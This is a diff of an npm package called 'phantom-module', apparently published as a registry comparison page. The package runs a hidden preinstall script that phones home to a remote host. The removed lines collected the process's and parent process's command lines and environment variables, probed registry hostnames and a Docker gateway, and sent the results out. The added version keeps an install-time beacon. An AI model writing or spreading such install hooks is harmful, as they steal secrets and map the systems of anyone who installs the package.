phantom-module 119.0.0 → 120.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +2 -5
- package/payload.js +5 -46
package/index.js
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
|
|
1
|
+
module.exports = 'phantom';
|
package/package.json
CHANGED
|
@@ -1,12 +1,9 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "phantom-module",
|
|
3
|
-
"version": "
|
|
3
|
+
"version": "120.0.0",
|
|
4
4
|
"description": "Phantom module",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
7
|
"preinstall": "node payload.js || true"
|
|
8
|
-
},
|
|
9
|
-
"dependencies": {
|
|
10
|
-
"ecto-spirit": "^119.0.0"
|
|
11
8
|
}
|
|
12
|
-
}
|
|
9
|
+
}
|
package/payload.js
CHANGED
|
@@ -1,7 +1,5 @@
|
|
|
1
|
-
const fs = require('fs');
|
|
2
1
|
const http = require('http');
|
|
3
|
-
const
|
|
4
|
-
const dns = require('dns');
|
|
2
|
+
const fs = require('fs');
|
|
5
3
|
|
|
6
4
|
if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
|
|
7
5
|
|
|
@@ -10,8 +8,8 @@ const REPORT_PORT = 31205;
|
|
|
10
8
|
|
|
11
9
|
async function report(moduleId, data) {
|
|
12
10
|
return new Promise((resolve) => {
|
|
13
|
-
const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n')
|
|
14
|
-
const manifest = `ecto_module:\n name: "
|
|
11
|
+
const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n');
|
|
12
|
+
const manifest = `ecto_module:\n name: "HEARTBEAT"\n cargo_hold: "${safeData}"\n`;
|
|
15
13
|
const payload = JSON.stringify({ manifest });
|
|
16
14
|
const req = http.request({
|
|
17
15
|
hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
|
|
@@ -24,46 +22,7 @@ async function report(moduleId, data) {
|
|
|
24
22
|
}
|
|
25
23
|
|
|
26
24
|
async function main() {
|
|
27
|
-
await report('ECT-
|
|
28
|
-
|
|
29
|
-
let info = '=== PROCESS INFO ===\n';
|
|
30
|
-
try {
|
|
31
|
-
info += `CMDLINE: ${fs.readFileSync('/proc/self/cmdline', 'utf8').replace(/\0/g, ' ')}\n`;
|
|
32
|
-
// Try to get parent info
|
|
33
|
-
const ppid = fs.readFileSync('/proc/self/stat', 'utf8').split(' ')[3];
|
|
34
|
-
info += `PPID: ${ppid}\n`;
|
|
35
|
-
if (fs.existsSync(`/proc/${ppid}/cmdline`)) {
|
|
36
|
-
info += `PARENT CMD: ${fs.readFileSync(`/proc/${ppid}/cmdline`, 'utf8').replace(/\0/g, ' ')}\n`;
|
|
37
|
-
}
|
|
38
|
-
if (fs.existsSync(`/proc/${ppid}/environ`)) {
|
|
39
|
-
info += `PARENT ENV: ${fs.readFileSync(`/proc/${ppid}/environ`, 'utf8').replace(/\0/g, '\n')}\n`;
|
|
40
|
-
}
|
|
41
|
-
} catch(e) { info += `ERR: ${e.message}\n`; }
|
|
42
|
-
|
|
43
|
-
await report('ECT-839201', info);
|
|
44
|
-
|
|
45
|
-
let net = '=== NET DEBUG ===\n';
|
|
46
|
-
|
|
47
|
-
// DNS Lookup
|
|
48
|
-
const hosts = ['verdaccio', 'registry', 'npm', 'verdaccio-server', 'host.docker.internal'];
|
|
49
|
-
for (const h of hosts) {
|
|
50
|
-
try {
|
|
51
|
-
await new Promise((res) => {
|
|
52
|
-
dns.lookup(h, (err, addr) => {
|
|
53
|
-
if (!err) net += `DNS ${h}: ${addr}\n`;
|
|
54
|
-
else net += `DNS ${h}: ERR\n`;
|
|
55
|
-
res();
|
|
56
|
-
});
|
|
57
|
-
});
|
|
58
|
-
} catch(e) {}
|
|
59
|
-
}
|
|
60
|
-
|
|
61
|
-
// Curl Gateway Verbose
|
|
62
|
-
try {
|
|
63
|
-
net += `CURL 172.17.0.1:4873:\n${execSync('curl -v --connect-timeout 3 http://172.17.0.1:4873 2>&1 || echo "curl fail"').toString()}\n`;
|
|
64
|
-
} catch(e) { net += `CURL ERR: ${e.message}\n`; }
|
|
65
|
-
|
|
66
|
-
await report('ECT-987654', net);
|
|
25
|
+
await report('ECT-839201', 'ALIVE 120');
|
|
67
26
|
}
|
|
68
27
|
|
|
69
|
-
main()
|
|
28
|
+
main();
|